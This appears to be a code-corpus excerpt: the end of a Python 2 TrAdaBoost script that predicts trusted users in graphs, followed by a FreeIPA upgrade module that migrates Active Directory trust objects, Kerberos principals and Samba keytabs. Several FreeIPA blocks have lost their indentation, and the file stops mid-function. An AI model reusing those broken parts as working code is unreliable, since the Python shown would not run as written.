    df = pd.read_csv(f_graph, sep=',', header=None)
    nodes = np.unique(df[[0, 1]].values);
    max_node_num = max(nodes) + 1
    n = len(nodes)
    # Build on the full id range first, then restrict to the used nodes.
    G = igraph.Graph(directed=True)
    G.add_vertices(max_node_num)
    G.add_edges(df[[0, 1]].values)
    G = G.subgraph(nodes)
    G = G.simplify(multiple=False) # remove loops
    # get adjacency matrix
    A = graph_to_sparse_matrix(G)
    v = eigen_trust(A)
    # features
    X = get_feature_matrix(G, features)
    return A, n, np.squeeze(X), v
# main
def main(f_source_graph):
    """Train TrAdaBoost on the source (signed) graph plus part of the SAG
    target graph, then report ROC AUC for predicting trusted users."""
    # params
    f_target_graph = 'sag/sag-network'
    f_target_roles = 'sag/sag-roles'
    f_target_dict = 'sag/sag-dictionary'
    n_trees = 200  # NOTE(review): appears unused -- confirm
    features = [ 'clustering_coefficient' , 'degree' , 'indegree' , 'outdegree', 'pr' ]
    # read datasets
    A_s, n_s, X_s, v_s = read_signed_graph(f_source_graph, features)
    A_t, n_t, X_t, v_t = read_target_graph(f_target_graph, features)
    df_dict = pd.read_csv(f_target_dict, sep=' ')
    df_roles_target = pd.read_csv(f_target_roles, header=None, sep=' ')
    # get users with 'no_captcha' (role code 5) i.e. trusted users
    r = df_roles_target.values
    no_captcha = r[r[:,1]==5][:,0]
    ids = df_dict['ent.string.name'].values # the user IDs in SAG system
    y_t = np.array([ np.isin(x, no_captcha) for x in ids ]).flatten()
    # Source labels: top-500 nodes by eigen-trust score are "trusted".
    index_trusted_s = np.argsort(v_s)[::-1][0:500]
    y_s = np.zeros(n_s)
    y_s[index_trusted_s] = 1
    # TraDaBoost: train on source + one target split, evaluate on the other
    X_t1, X_t2, y_t1, y_t2 = train_test_split(X_t, y_t, test_size=0.33, random_state=4242)
    v_pred = tradaboost(X_t1, X_s, y_t1, y_s, X_t2, 10)
    print v_pred
    auc = roc_auc_score(y_t2, v_pred)
    print auc
    #auc = roc_auc_score(y_t, v_t)
    #print auc
#print auc
if __name__ == '__main__':
    # init: bind the module-level transform hooks used by get_feature()
    _transform_func_degree = no_transform
    _transform_func = no_transform
    # Select the source graph from the first CLI argument.
    if sys.argv[1] == 'epinions':
        f_source_graph = 'epinions/out.epinions'
    else: # 'slashdotzoo'
        f_source_graph = 'slashdot-zoo/out.matrix'
    main(f_source_graph)
| yfiua/TraNet | trust/trust-tradaboost.py | Python | gpl-3.0 | 5,064 |
# Copyright (C) 2012-2019 FreeIPA Contributors see COPYING for license
import logging
from collections import namedtuple
from textwrap import dedent
from ipalib import Registry, errors
from ipalib import Updater
from ipapython.dn import DN
from ipapython import ipautil
from ipaplatform.paths import paths
from ipaserver.install import service
from ipaserver.install import sysupgrade
from ipaserver.install.adtrustinstance import (
ADTRUSTInstance, map_Guests_to_nobody)
from ipaserver.dcerpc_common import TRUST_BIDIRECTIONAL
try:
from samba.ndr import ndr_unpack
from samba.dcerpc import lsa, drsblobs
except ImportError:
# If samba.ndr is not available, this machine is not provisioned
# for serving a trust to Active Directory. As result, it does
# not matter what ndr_unpack does but we save on pylint checks
def ndr_unpack(x):
raise NotImplementedError
drsblobs = None
logger = logging.getLogger(__name__)
register = Registry()
DEFAULT_ID_RANGE_SIZE = 200000
trust_read_keys_template = \
["cn=adtrust agents,cn=sysaccounts,cn=etc,{basedn}",
"cn=trust admins,cn=groups,cn=accounts,{basedn}"]
@register()
class update_default_range(Updater):
    """
    Create default ID range for upgraded servers.
    """
    def execute(self, **options):
        """Add the default ipa-local ID range if none exists, basing it on
        the admins group GID; also warn when DNA state suggests the
        hard-coded default size is too small."""
        ldap = self.api.Backend.ldap2
        # Skip entirely when any ID range already exists.
        dn = DN(self.api.env.container_ranges, self.api.env.basedn)
        search_filter = "objectclass=ipaDomainIDRange"
        try:
            ldap.find_entries(search_filter, [], dn)
        except errors.NotFound:
            pass
        else:
            logger.debug("default_range: ipaDomainIDRange entry found, skip "
                         "plugin")
            return False, []
        # The admins group GID anchors the base of the new range.
        dn = DN(('cn', 'admins'), self.api.env.container_group,
                self.api.env.basedn)
        try:
            admins_entry = ldap.get_entry(dn, ['gidnumber'])
        except errors.NotFound:
            logger.error("default_range: No local ID range and no admins "
                         "group found. Cannot create default ID range")
            return False, []
        id_range_base_id = admins_entry['gidnumber'][0]
        id_range_name = '%s_id_range' % self.api.env.realm
        id_range_size = DEFAULT_ID_RANGE_SIZE
        range_entry = [
            dict(attr='objectclass', value='top'),
            dict(attr='objectclass', value='ipaIDrange'),
            dict(attr='objectclass', value='ipaDomainIDRange'),
            dict(attr='cn', value=id_range_name),
            dict(attr='ipabaseid', value=id_range_base_id),
            dict(attr='ipaidrangesize', value=id_range_size),
            dict(attr='iparangetype', value='ipa-local'),
        ]
        dn = DN(('cn', '%s_id_range' % self.api.env.realm),
                self.api.env.container_ranges, self.api.env.basedn)
        update = {'dn': dn, 'default': range_entry}
        # Default range entry has a hard-coded range size to 200000 which is
        # a default range size in ipa-server-install. This could cause issues
        # if user did not use a default range, but rather defined an own,
        # bigger range (option --idmax).
        # We should make our best to check if this is the case and provide
        # user with an information how to fix it.
        dn = DN(self.api.env.container_dna_posix_ids, self.api.env.basedn)
        search_filter = "objectclass=dnaSharedConfig"
        attrs = ['dnaHostname', 'dnaRemainingValues']
        try:
            (entries, _truncated) = ldap.find_entries(search_filter, attrs, dn)
        except errors.NotFound:
            logger.warning("default_range: no dnaSharedConfig object found. "
                           "Cannot check default range size.")
        else:
            # Sum remaining DNA values, counting each master only once.
            masters = set()
            remaining_values_sum = 0
            for entry in entries:
                hostname = entry.get('dnahostname', [None])[0]
                if hostname is None or hostname in masters:
                    continue
                remaining_values = entry.get('dnaremainingvalues', [''])[0]
                try:
                    remaining_values = int(remaining_values)
                except ValueError:
                    logger.warning("default_range: could not parse "
                                   "remaining values from '%s'",
                                   remaining_values)
                    continue
                else:
                    remaining_values_sum += remaining_values
                masters.add(hostname)
            # More remaining values than the default size implies the real
            # installed range was larger; tell the admin how to fix it.
            if remaining_values_sum > DEFAULT_ID_RANGE_SIZE:
                msg = ['could not verify default ID range size',
                       'Please use the following command to set correct ID range size',
                       ' $ ipa range-mod %s --range-size=RANGE_SIZE' % id_range_name,
                       'RANGE_SIZE may be computed from --idstart and --idmax options '
                       'used during IPA server installation:',
                       ' RANGE_SIZE = (--idmax) - (--idstart) + 1'
                       ]
                logger.error("default_range: %s", "\n".join(msg))
        return False, [update]
@register()
class update_default_trust_view(Updater):
    """
    Create Default Trust View for upgraded servers.
    """
    def execute(self, **options):
        """Create the 'Default Trust View' entry when AD trusts are enabled
        and the view does not exist yet; otherwise do nothing."""
        ldap = self.api.Backend.ldap2
        view_dn = DN(('cn', 'Default Trust View'),
                     self.api.env.container_views,
                     self.api.env.basedn)

        # Nothing to do unless AD trust support is configured on this server.
        if not self.api.Command.adtrust_is_enabled()['result']:
            logger.debug('AD Trusts are not enabled on this server')
            return False, []

        # Skip servers that already carry the view.
        try:
            ldap.get_entry(view_dn)
        except errors.NotFound:
            pass
        else:
            logger.debug('Default Trust View already present on this server')
            return False, []

        # Trusts are enabled but the view is absent: create it now.
        view_entry = [
            dict(attr='objectclass', value='top'),
            dict(attr='objectclass', value='ipaIDView'),
            dict(attr='cn', value='Default Trust View'),
            dict(attr='description', value='Default Trust View for AD users. '
                 'Should not be deleted.'),
        ]
        return False, [{'dn': view_dn, 'default': view_entry}]
@register()
class update_sigden_extdom_broken_config(Updater):
    """Fix configuration of sidgen and extdom plugins

    Upgrade to IPA 4.2+ cause that sidgen and extdom plugins have improperly
    configured basedn.

    All trusts which have been added when config was broken must to be
    re-added manually.

    https://fedorahosted.org/freeipa/ticket/5665
    """
    sidgen_config_dn = DN("cn=IPA SIDGEN,cn=plugins,cn=config")
    extdom_config_dn = DN("cn=ipa_extdom_extop,cn=plugins,cn=config")
    def _fix_config(self):
        """Due upgrade error configuration of sidgen and extdom plugins may
        contain literally "$SUFFIX" value instead of real DN in nsslapd-basedn
        attribute

        :return: True if config was fixed, False if fix is not needed
        """
        ldap = self.api.Backend.ldap2
        basedn_attr = 'nsslapd-basedn'
        modified = False
        for dn in (self.sidgen_config_dn, self.extdom_config_dn):
            try:
                entry = ldap.get_entry(dn, attrs_list=[basedn_attr])
            except errors.NotFound:
                logger.debug("configuration for %s not found, skipping", dn)
            else:
                configured_suffix = entry.single_value.get(basedn_attr)
                if configured_suffix is None:
                    raise RuntimeError(
                        "Missing attribute {attr} in {dn}".format(
                            attr=basedn_attr, dn=dn
                        )
                    )
                elif configured_suffix == "$SUFFIX":
                    # configured value is wrong, fix it
                    entry.single_value[basedn_attr] = str(self.api.env.basedn)
                    logger.debug("updating attribute %s of %s to correct "
                                 "value %s",
                                 basedn_attr, dn, self.api.env.basedn)
                    ldap.update_entry(entry)
                    modified = True
                else:
                    logger.debug("configured basedn for %s is okay", dn)
        return modified
    def execute(self, **options):
        """Run the config fix once; flag SID regeneration when anything
        changed and remember completion in the sysupgrade state file."""
        if sysupgrade.get_upgrade_state('sidgen', 'config_basedn_updated'):
            logger.debug("Already done, skipping")
            return False, ()
        restart = False
        if self._fix_config():
            # A config change means SIDs may be missing -> schedule update.
            sysupgrade.set_upgrade_state('sidgen', 'update_sids', True)
            restart = True  # DS has to be restarted to apply changes
        sysupgrade.set_upgrade_state('sidgen', 'config_basedn_updated', True)
        return restart, ()
@register()
class update_sids(Updater):
    """SIDs may be not created properly if bug with wrong configuration for
    sidgen and extdom plugins is effective

    This must be run after "update_sigden_extdom_broken_config"

    https://fedorahosted.org/freeipa/ticket/5665
    """
    sidgen_config_dn = DN("cn=IPA SIDGEN,cn=plugins,cn=config")
    def execute(self, **options):
        """Kick off the sidgen task when the IPA domain object lacks its SID
        and warn about trusts broken by the misconfiguration.

        Only runs when update_sigden_extdom_broken_config set the
        'update_sids' flag; clears the flag when done.
        """
        ldap = self.api.Backend.ldap2
        if sysupgrade.get_upgrade_state('sidgen', 'update_sids') is not True:
            logger.debug("SIDs do not need to be generated")
            return False, ()
        # check if IPA domain for AD trust has been created, and if we need to
        # regenerate missing SIDs if attribute 'ipaNTSecurityIdentifier'
        domain_IPA_AD_dn = DN(
            ('cn', self.api.env.domain),
            self.api.env.container_cifsdomains,
            self.api.env.basedn)
        attr_name = 'ipaNTSecurityIdentifier'
        try:
            entry = ldap.get_entry(domain_IPA_AD_dn, attrs_list=[attr_name])
        except errors.NotFound:
            logger.debug("IPA domain object %s is not configured",
                         domain_IPA_AD_dn)
            sysupgrade.set_upgrade_state('sidgen', 'update_sids', False)
            return False, ()
        else:
            if not entry.single_value.get(attr_name):
                # we need to run sidgen task
                sidgen_task_dn = DN(
                    "cn=generate domain sid,cn=ipa-sidgen-task,cn=tasks,"
                    "cn=config")
                sidgen_tasks_attr = {
                    "objectclass": ["top", "extensibleObject"],
                    "cn": ["sidgen"],
                    "delay": [0],
                    "nsslapd-basedn": [self.api.env.basedn],
                }
                task_entry = ldap.make_entry(sidgen_task_dn,
                                             **sidgen_tasks_attr)
                try:
                    ldap.add_entry(task_entry)
                except errors.DuplicateEntry:
                    logger.debug("sidgen task already created")
                else:
                    logger.debug("sidgen task has been created")
        # we have to check all trusts domains which may been affected by the
        # bug. Symptom is missing 'ipaNTSecurityIdentifier' attribute
        base_dn = DN(self.api.env.container_adtrusts, self.api.env.basedn)
        try:
            trust_domain_entries, truncated = ldap.find_entries(
                base_dn=base_dn,
                scope=ldap.SCOPE_ONELEVEL,
                attrs_list=["cn"],
                # more types of trusts can be stored under cn=trusts, we need
                # the type with ipaNTTrustPartner attribute
                filter="(&(ipaNTTrustPartner=*)(!(%s=*)))" % attr_name
            )
        except errors.NotFound:
            pass
        else:
            if truncated:
                logger.warning("update_sids: Search results were truncated")
            # Affected trusts cannot be repaired automatically; tell the
            # admin to re-create each one.
            for entry in trust_domain_entries:
                domain = entry.single_value["cn"]
                logger.error(
                    "Your trust to %s is broken. Please re-create it by "
                    "running 'ipa trust-add' again.", domain)
        sysupgrade.set_upgrade_state('sidgen', 'update_sids', False)
        return False, ()
def get_gidNumber(ldap, env):
    """Return the gidnumber attribute (a list) of the fallback SMB group,
    or None when the group or the attribute is missing (both are logged
    as errors)."""
    fallback = ADTRUSTInstance.FALLBACK_GROUP_NAME
    group_dn = DN(('cn', fallback), env.container_group, env.basedn)
    try:
        entry = ldap.get_entry(group_dn, ['gidnumber'])
    except errors.NotFound:
        logger.error("%s not found", fallback)
        return None
    gid = entry.get('gidnumber')
    if gid is None:
        logger.error("%s does not have a gidnumber", fallback)
        return None
    return gid
@register()
class update_tdo_gidnumber(Updater):
    """
    Create a gidNumber attribute for Trusted Domain Objects.

    The value is taken from the fallback group defined in cn=Default SMB Group.
    """
    def execute(self, **options):
        """Backfill POSIX attributes (gidNumber, uidNumber, uid,
        homedirectory, ...) on existing trusted domain objects so AD DCs
        can authenticate against our Samba instance.

        Returns a no-restart, no-LDIF result in every case.
        """
        ldap = self.api.Backend.ldap2
        # First, see if trusts are enabled on the server
        if not self.api.Command.adtrust_is_enabled()['result']:
            logger.debug('AD Trusts are not enabled on this server')
            return False, []
        gidNumber = get_gidNumber(ldap, self.api.env)
        if not gidNumber:
            logger.error("%s does not have a gidnumber",
                         ADTRUSTInstance.FALLBACK_GROUP_NAME)
            return False, ()
        # For each trusted domain object, add posix attributes
        # to allow use of a trusted domain account by AD DCs
        # to authenticate against our Samba instance
        try:
            tdos = ldap.get_entries(
                DN(self.api.env.container_adtrusts, self.api.env.basedn),
                scope=ldap.SCOPE_ONELEVEL,
                filter="(&(objectclass=ipaNTTrustedDomain)"
                       "(objectclass=ipaIDObject))",
                # Bug fix: a missing comma used to fuse 'ipaNTTrustDirection'
                # and 'uid' into one bogus attribute name via implicit string
                # concatenation, so neither was fetched and 'uid' was re-set
                # on every run; 'homedirectory' is also fetched now because
                # it is checked below.
                attrs_list=['gidnumber', 'uidnumber', 'objectclass',
                            'ipantsecurityidentifier',
                            'ipaNTTrustDirection', 'homedirectory',
                            'uid', 'cn', 'ipantflatname'])
            for tdo in tdos:
                # if the trusted domain object does not contain gidnumber,
                # add the default fallback group gidnumber
                if not tdo.get('gidnumber'):
                    tdo['gidnumber'] = gidNumber
                # Generate uidNumber and ipaNTSecurityIdentifier if
                # uidNumber is missing. We rely on sidgen plugin here
                # to generate ipaNTSecurityIdentifier.
                if not tdo.get('uidnumber'):
                    tdo['uidnumber'] = ['-1']
                if 'posixAccount' not in tdo.get('objectclass'):
                    tdo['objectclass'].extend(['posixAccount'])
                # Based on the flat name of a TDO,
                # add user name FLATNAME$ (note dollar sign)
                # to allow SSSD to map this TDO to a POSIX account
                if not tdo.get('uid'):
                    tdo['uid'] = ["{flatname}$".format(
                        flatname=tdo.single_value['ipantflatname'])]
                if not tdo.get('homedirectory'):
                    tdo['homedirectory'] = ['/dev/null']
                # Store resulted entry
                try:
                    ldap.update_entry(tdo)
                except errors.ExecutionError as e:
                    # Best effort: log and continue with the remaining TDOs.
                    logger.warning(
                        "Failed to update trusted domain object %s", tdo.dn)
                    logger.debug("Exception during TDO update: %s", str(e))
        except errors.NotFound:
            logger.debug("No trusted domain object to update")
            return False, ()
        return False, ()
@register()
class update_mapping_Guests_to_nobody(Updater):
    """
    Map BUILTIN\\Guests group to nobody

    Samba 4.9 became more strict on availability of builtin Guests group
    """
    def execute(self, **options):
        """Apply the Guests-to-nobody mapping on trust-enabled servers."""
        adtrust_enabled = self.api.Command.adtrust_is_enabled()['result']
        if adtrust_enabled:
            map_Guests_to_nobody()
        else:
            logger.debug('AD Trusts are not enabled on this server')
        return False, []
@register()
class update_tdo_to_new_layout(Updater):
"""
Transform trusted domain objects into a new layout
There are now two Kerberos principals per direction of trust:
INBOUND:
- krbtgt/<OUR REALM>@<REMOTE REALM>, enabled by default
- <OUR FLATNAME$>@<REMOTE REALM>, disabled by default on our side
as it is only used by SSSD to retrieve TDO creds when operating
as an AD Trust agent across IPA topology
OUTBOUND:
- krbtgt/<REMOTE REALM>@<OUR REALM>, enabled by default
- <REMOTE FLATNAME$>@<OUR REALM>, enabled by default and
used by remote trusted DCs to authenticate against us
This principal also has krbtgt/<REMOTE FLATNAME>@<OUR REALM> defined
as a Kerberos principal alias. This is due to how Kerberos
key salt is derived for cross-realm principals on AD side
Finally, Samba requires <REMOTE FLATNAME$> account to also possess POSIX
and SMB identities. We ensure this by making the trusted domain object to
be this account with 'uid' and 'cn' attributes being '<REMOTE FLATNAME$>'
and uidNumber/gidNumber generated automatically. Also, we ensure the
trusted domain object is given a SID.
The update to <REMOTE FLATNAME$> POSIX/SMB identities is done through
the update plugin update_tdo_gidnumber.
"""
tgt_principal_template = "krbtgt/{remote}@{local}"
nbt_principal_template = "{nbt}$@{realm}"
trust_filter = \
"(&(objectClass=ipaNTTrustedDomain)(objectClass=ipaIDObject))"
trust_attrs = ("ipaNTFlatName", "ipaNTTrustPartner", "ipaNTTrustDirection",
"cn", "ipaNTTrustAttributes", "ipaNTAdditionalSuffixes",
"ipaNTTrustedDomainSID", "ipaNTTrustType",
"ipaNTTrustAuthIncoming", "ipaNTTrustAuthOutgoing")
change_password_template = \
"change_password -pw {password} " \
"-e aes256-cts-hmac-sha1-96,aes128-cts-hmac-sha1-96 " \
"{principal}"
KRB_PRINC_CREATE_DEFAULT = 0x00000000
KRB_PRINC_CREATE_DISABLED = 0x00000001
KRB_PRINC_CREATE_AGENT_PERMISSION = 0x00000002
KRB_PRINC_CREATE_IDENTITY = 0x00000004
KRB_PRINC_MUST_EXIST = 0x00000008
# This is a flag for krbTicketFlags attribute
# to disallow creating any tickets using this principal
KRB_DISALLOW_ALL_TIX = 0x00000040
def retrieve_trust_password(self, packed):
# The structure of the trust secret is described at
# https://github.com/samba-team/samba/blob/master/
# librpc/idl/drsblobs.idl#L516-L569
# In our case in LDAP TDO object stores
# `struct trustAuthInOutBlob` that has `count` and
# the `current` of `AuthenticationInformationArray` struct
# which has own `count` and `array` of `AuthenticationInformation`
# structs that have `AuthType` field which should be equal to
# `LSA_TRUST_AUTH_TYPE_CLEAR`.
# Then AuthInfo field would contain a password as an array of bytes
assert(packed.count != 0)
assert(packed.current.count != 0)
assert(packed.current.array[0].AuthType == lsa.TRUST_AUTH_TYPE_CLEAR)
clear_value = packed.current.array[0].AuthInfo.password
return ''.join(map(chr, clear_value))
def set_krb_principal(self, principals, password, trustdn, flags=None):
ldap = self.api.Backend.ldap2
if isinstance(principals, (list, tuple)):
trust_principal = principals[0]
alias = principals[1]
else:
trust_principal = principals
alias = None
entry = None
en = None
try:
entry = ldap.get_entry(
DN(('krbprincipalname', trust_principal), trustdn))
dn = entry.dn
action = ldap.update_entry
ticket_flags = int(entry.single_value.get('krbticketflags', 0))
logger.debug("Updating Kerberos principal entry for %s",
trust_principal)
except errors.NotFound:
# For a principal that must exist, we re-raise the exception
# to let the caller to handle this situation
if flags & self.KRB_PRINC_MUST_EXIST:
raise
ticket_flags = 0
if alias:
try:
en = ldap.get_entry(
DN(('krbprincipalname', alias), trustdn))
ldap.delete_entry(en.dn)
ticket_flags = int(en.single_value.get(
'krbticketflags', 0))
except errors.NotFound:
logger.debug("Entry for alias TDO does not exist for "
"trusted domain object %s, skip it",
alias)
dn = DN(('krbprincipalname', trust_principal), trustdn)
entry = ldap.make_entry(dn)
logger.debug("Adding Kerberos principal entry for %s",
trust_principal)
action = ldap.add_entry
entry_data = {
'objectclass':
['krbPrincipal', 'krbPrincipalAux',
'krbTicketPolicyAux', 'top'],
'krbcanonicalname': [trust_principal],
'krbprincipalname': [trust_principal],
}
if flags & self.KRB_PRINC_CREATE_DISABLED:
entry_data['krbticketflags'] = (ticket_flags |
self.KRB_DISALLOW_ALL_TIX)
if flags & self.KRB_PRINC_CREATE_AGENT_PERMISSION:
entry_data['objectclass'].extend(['ipaAllowedOperations'])
if alias:
entry_data['krbprincipalname'].extend([alias])
if en:
entry_data['krbprincipalkey'] = en.single_value.get(
'krbprincipalkey')
entry_data['krbextradata'] = en.single_value.get(
'krbextradata')
read_keys = en.get('ipaAllowedToPerform;read_keys', [])
if not read_keys:
# Old style, no ipaAllowedToPerform;read_keys in the entry,
# use defaults that ipasam should have set when creating a
# trust
read_keys = list(map(
lambda x: x.format(basedn=self.api.env.basedn),
trust_read_keys_template))
entry_data['ipaAllowedToPerform;read_keys'] = read_keys
entry.update(entry_data)
try:
action(entry)
except errors.EmptyModlist:
logger.debug("No update was required for Kerberos principal %s",
trust_principal)
# If entry existed, no need to set Kerberos keys on it
if action == ldap.update_entry:
logger.debug("No need to update Kerberos keys for "
"existing Kerberos principal %s",
trust_principal)
return
# Now that entry is updated, set its Kerberos keys.
#
# It would be a complication to use ipa-getkeytab LDAP extended control
# here because we would need to encode the request in ASN.1 sequence
# and we don't have the code to do so exposed in Python bindings.
# Instead, as we run on IPA master, we can use kadmin.local for that
# directly.
# We pass the command as a stdin to both avoid shell interpolation
# of the passwords and also to avoid its exposure to other processes
# Since we don't want to record the output, make also a redacted log
change_password = self.change_password_template.format(
password=password,
principal=trust_principal)
redacted = self.change_password_template.format(
password='<REDACTED OUT>',
principal=trust_principal)
logger.debug("Updating Kerberos keys for %s with the following "
"kadmin command:\n\t%s", trust_principal, redacted)
ipautil.run([paths.KADMIN_LOCAL, "-x",
"ipa-setup-override-restrictions"],
stdin=change_password, skip_output=True)
    def execute(self, **options):
        """Create Kerberos principals for existing AD trusts during upgrade.

        For every bidirectional trust object found under the adtrusts
        container, ensures the four related principals (outbound/inbound,
        realm and NetBIOS flat-name forms) exist and have their keys set.
        Always returns (False, []): no restart is requested and all changes
        are applied directly.
        """
        # First, see if trusts are enabled on the server
        if not self.api.Command.adtrust_is_enabled()['result']:
            logger.debug('AD Trusts are not enabled on this server')
            return False, []
        # If we have no Samba bindings, this master is not a trust controller
        if drsblobs is None:
            return False, []
        ldap = self.api.Backend.ldap2
        # Bail out if the fallback group gidNumber cannot be determined
        gidNumber = get_gidNumber(ldap, self.api.env)
        if gidNumber is None:
            return False, []
        result = self.api.Command.trustconfig_show()['result']
        our_nbt_name = result.get('ipantflatname', [None])[0]
        if not our_nbt_name:
            return False, []
        trusts_dn = self.api.env.container_adtrusts + self.api.env.basedn
        # We might be in a situation when no trusts exist yet
        # In such case there is nothing to upgrade but we have to catch
        # an exception or it will abort the whole upgrade process
        try:
            trusts = ldap.get_entries(
                base_dn=trusts_dn,
                scope=ldap.SCOPE_ONELEVEL,
                filter=self.trust_filter,
                attrs_list=self.trust_attrs)
        except errors.EmptyResult:
            trusts = []
        # For every trust, retrieve its principals and convert
        for t_entry in trusts:
            t_dn = t_entry.dn
            logger.debug('Processing trust domain object %s', str(t_dn))
            t_realm = t_entry.single_value.get('ipaNTTrustPartner').upper()
            direction = int(t_entry.single_value.get('ipaNTTrustDirection'))
            # Trust passwords are stored as Samba trustAuthInOutBlob
            # structures; unpack them with samba's NDR bindings
            passwd_incoming = self.retrieve_trust_password(
                ndr_unpack(drsblobs.trustAuthInOutBlob,
                           t_entry.single_value.get('ipaNTTrustAuthIncoming')))
            passwd_outgoing = self.retrieve_trust_password(
                ndr_unpack(drsblobs.trustAuthInOutBlob,
                           t_entry.single_value.get('ipaNTTrustAuthOutgoing')))
            # For outbound and inbound trusts, process four principals total
            if (direction & TRUST_BIDIRECTIONAL) == TRUST_BIDIRECTIONAL:
                # 1. OUTBOUND: krbtgt/<REMOTE REALM>@<OUR REALM> must exist
                trust_principal = self.tgt_principal_template.format(
                    remote=t_realm, local=self.api.env.realm)
                try:
                    self.set_krb_principal(trust_principal,
                                           passwd_outgoing,
                                           t_dn,
                                           flags=self.KRB_PRINC_CREATE_DEFAULT)
                except errors.NotFound:
                    # It makes no sense to convert this one, skip the trust
                    # completely, better to re-establish one
                    logger.error(
                        "Broken trust to AD: %s not found, "
                        "please re-establish the trust to %s",
                        trust_principal, t_realm)
                    continue
                # 2. Create <REMOTE FLATNAME$>@<OUR REALM>
                nbt_name = t_entry.single_value.get('ipaNTFlatName')
                nbt_principal = self.nbt_principal_template.format(
                    nbt=nbt_name, realm=self.api.env.realm)
                tgt_principal = self.tgt_principal_template.format(
                    remote=nbt_name, local=self.api.env.realm)
                self.set_krb_principal([nbt_principal, tgt_principal],
                                       passwd_incoming,
                                       t_dn,
                                       flags=self.KRB_PRINC_CREATE_DEFAULT)
                # 3. INBOUND: krbtgt/<OUR REALM>@<REMOTE REALM> must exist
                trust_principal = self.tgt_principal_template.format(
                    remote=self.api.env.realm, local=t_realm)
                # NOTE(review): passwd_outgoing is used here although this is
                # the inbound TGT -- confirm against the trust password
                # conventions used by ipasam
                try:
                    self.set_krb_principal(trust_principal, passwd_outgoing,
                                           t_dn,
                                           flags=self.KRB_PRINC_CREATE_DEFAULT)
                except errors.NotFound:
                    # It makes no sense to convert this one, skip the trust
                    # completely, better to re-establish one
                    logger.error(
                        "Broken trust to AD: %s not found, "
                        "please re-establish the trust to %s",
                        trust_principal, t_realm)
                    continue
                # 4. Create krbtgt/<OUR FLATNAME>@<REMOTE REALM>, disabled
                nbt_principal = self.nbt_principal_template.format(
                    nbt=our_nbt_name, realm=t_realm)
                tgt_principal = self.tgt_principal_template.format(
                    remote=our_nbt_name, local=t_realm)
                self.set_krb_principal([tgt_principal, nbt_principal],
                                       passwd_incoming,
                                       t_dn,
                                       flags=self.KRB_PRINC_CREATE_DEFAULT |
                                       self.KRB_PRINC_CREATE_AGENT_PERMISSION |
                                       self.KRB_PRINC_CREATE_DISABLED)
        return False, []
# One keytab entry as printed by `klist -eK -k`: key version number,
# principal name, encryption type and hex-encoded key material.
KeyEntry = namedtuple('KeyEntry',
                      ['kvno', 'principal', 'etype', 'key'])
@register()
class update_host_cifs_keytabs(Updater):
    """Keep Samba's keytab in sync with the host keytab.

    AD domain members authenticate DCE RPC requests with service tickets
    for the host/<domain controller> principal, because in Active Directory
    service keys equal the machine account credentials and services are
    merely aliases of the machine account object.  Samba therefore needs a
    copy of this host's keys.
    """
    host_princ_template = "host/{master}@{realm}"
    valid_etypes = ['aes256-cts-hmac-sha1-96', 'aes128-cts-hmac-sha1-96']

    def extract_key_refs(self, keytab):
        """Return this host's principal key entries found in *keytab*.

        Runs ``klist -eK -k`` and keeps only the lines for our host/
        principal that use one of the accepted AES enctypes.  Returns a
        list of KeyEntry tuples, or None when klist fails.
        """
        principal = self.host_princ_template.format(
            master=self.api.env.host, realm=self.api.env.realm)
        klist = ipautil.run([paths.KLIST, "-eK", "-k", keytab],
                            capture_output=True, raiseonerr=False,
                            nolog_output=True)
        if klist.returncode != 0:
            return None
        entries = []
        for line in klist.output.splitlines():
            if principal not in line:
                continue
            if not any(etype in line for etype in self.valid_etypes):
                continue
            fields = line.split()
            # klist wraps the enctype and the key in parentheses; drop them
            fields[-2] = fields[-2].strip('()')
            fields[-1] = fields[-1].strip('()')
            entries.append(KeyEntry._make(fields))
        return entries

    def copy_key(self, keytab, keyentry):
        """Write *keyentry* into *keytab* via ktutil."""
        # keyentry.key is the hex key value prefixed with 0x, as produced
        # by klist -K -k; ktutil accepts it without the 0x prefix, so the
        # first two characters are stripped.
        script = dedent("""\
            rkt {keytab}
            addent -key -p {principal} -k {kvno} -e {etype}
            {key}
            wkt {keytab}
            """).format(keytab=keytab, principal=keyentry.principal,
                        kvno=keyentry.kvno, etype=keyentry.etype,
                        key=keyentry.key[2:])
        res = ipautil.run([paths.KTUTIL], stdin=script, raiseonerr=False,
                          umask=0o077, nolog_output=True)
        if res.returncode != 0:
            logger.warning('Unable to update %s with new keys', keytab)

    def execute(self, **options):
        # Nothing to do unless AD trust support is enabled on this server
        if not self.api.Command.adtrust_is_enabled()['result']:
            logger.debug('AD Trusts are not enabled on this server')
            return False, []

        hostkeys = self.extract_key_refs(paths.KRB5_KEYTAB)
        cifskeys = self.extract_key_refs(paths.SAMBA_KEYTAB)
        if hostkeys is None or cifskeys is None:
            logger.warning('Either %s or %s are missing or unreadable',
                           paths.KRB5_KEYTAB, paths.SAMBA_KEYTAB)
            return False, []

        # Copy into the Samba keytab every host key that is either absent
        # there or present with a different key value and/or KVNO.
        for hostkey in hostkeys:
            matching = [c for c in cifskeys
                        if c.principal == hostkey.principal
                        and c.etype == hostkey.etype]
            stale = next((c for c in matching
                          if c.key != hostkey.key or c.kvno != hostkey.kvno),
                         None)
            if stale is not None or not matching:
                self.copy_key(paths.SAMBA_KEYTAB, hostkey)
        return False, []
@register()
class update_tdo_default_read_keys_permissions(Updater):
    """Grant the default read_keys permissions to existing TDO entries."""
    trust_filter = (
        "(&(objectClass=krbPrincipal)(krbPrincipalName=krbtgt/{nbt}@*))")

    def execute(self, **options):
        ldap = self.api.Backend.ldap2
        # Nothing to do unless AD trust support is enabled on this server
        if not self.api.Command.adtrust_is_enabled()['result']:
            logger.debug('AD Trusts are not enabled on this server')
            return False, []

        result = self.api.Command.trustconfig_show()['result']
        our_nbt_name = result.get('ipantflatname', [None])[0]
        if not our_nbt_name:
            return False, []

        trusts_dn = self.api.env.container_adtrusts + self.api.env.basedn
        tdo_filter = self.trust_filter.format(nbt=our_nbt_name)

        # No trusts may exist yet.  There is nothing to upgrade then, but an
        # uncaught EmptyResult would abort the whole upgrade process.
        try:
            tdos = ldap.get_entries(
                base_dn=trusts_dn,
                scope=ldap.SCOPE_SUBTREE,
                filter=tdo_filter,
                attrs_list=['*'])
        except errors.EmptyResult:
            tdos = []

        for tdo in tdos:
            changes = {}
            object_classes = tdo.get('objectClass', [])
            if 'ipaAllowedOperations' not in object_classes:
                changes['objectClass'] = (
                    object_classes + ['ipaAllowedOperations'])
            if not tdo.get('ipaAllowedToPerform;read_keys', []):
                changes['ipaAllowedToPerform;read_keys'] = [
                    tmpl.format(basedn=self.api.env.basedn)
                    for tmpl in trust_read_keys_template]
